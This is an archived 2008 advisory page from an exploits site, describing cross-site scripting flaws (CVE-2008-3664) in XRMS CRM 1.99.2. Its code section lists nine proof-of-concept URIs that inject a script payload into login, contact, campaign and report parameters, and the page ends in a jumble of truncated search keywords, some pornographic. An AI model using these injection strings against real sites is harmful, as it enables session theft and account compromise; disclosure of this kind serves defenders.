exploits , vulnerabilities , articles , XRMS CRM Multiple Input Validation Vulnerabilities
| Title |
XRMS CRM Multiple Input Validation Vulnerabilities |
| Published |
2008-09-04-12:00AM |
| Updated |
2008-09-04-04:24PM |
| Class |
Input Validation Error |
| CVE |
CVE-2008-3664 |
| Remote |
Yes |
| Local |
No |
| Credit |
Fabian Fingerle |
| Vulnerable |
XRMS CRM XRMS 1.99.2
|
| Not Vulnerable |
|
| Code |
Attackers can exploit these issues via a browser. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user into following a malicious URI.The following example URIs are available to demonstrate the cross-site scripting issues:http://www.example.com/xrms/login.php?target="><script>alert(1);</script>
http://www.example.com/xrms/activities/some.php?title="><script>alert(1);</script>
http://www.example.com/xrms/companies/some.php?company_name="><script>alert(1);</script>
http://www.example.com/xrms/contacts/some.php?last_name="><script>alert(1);</script>
http://www.example.com/xrms/campaigns/some.php?campaign_title="><script>alert(1);</script>
http://www.example.com/xrms/opportunities/some.php?opportunity_title="><script>alert(1);</script>
http://www.example.com/xrms/cases/some.php?case_title="><script>alert(1);</script>
http://www.example.com/xrms/files/some.php?file_id="><script>alert(1);</script>
http://www.example.com/xrms/reports/custom/mileage.php?starting="><script>alert(1);</script> |
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Sun, 23 Nov 2008 09:22:31 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Invision P mambo Remo wwe.bluefi mambo Remo Www.porn.c Www.sex89. mambo Remo face asian dragon fab Free downl ProFTPD IceWarp We mambo Remo news for c 200 /compo news for C micro_http php fusion mambo Remo exploit fo Sexirani t738t pi images ftp expert mambo Remo t248t mambo Remo jjmovies news for c winproxy vbulletin CUPS Gambar Cew Mobile por quicksilve alienform 200 /compo vidio se phpBB por news for c mambo Remo mambo Remo Black sex Trend Micr guest book delphi phpBB tightVNC news for c news for c
|
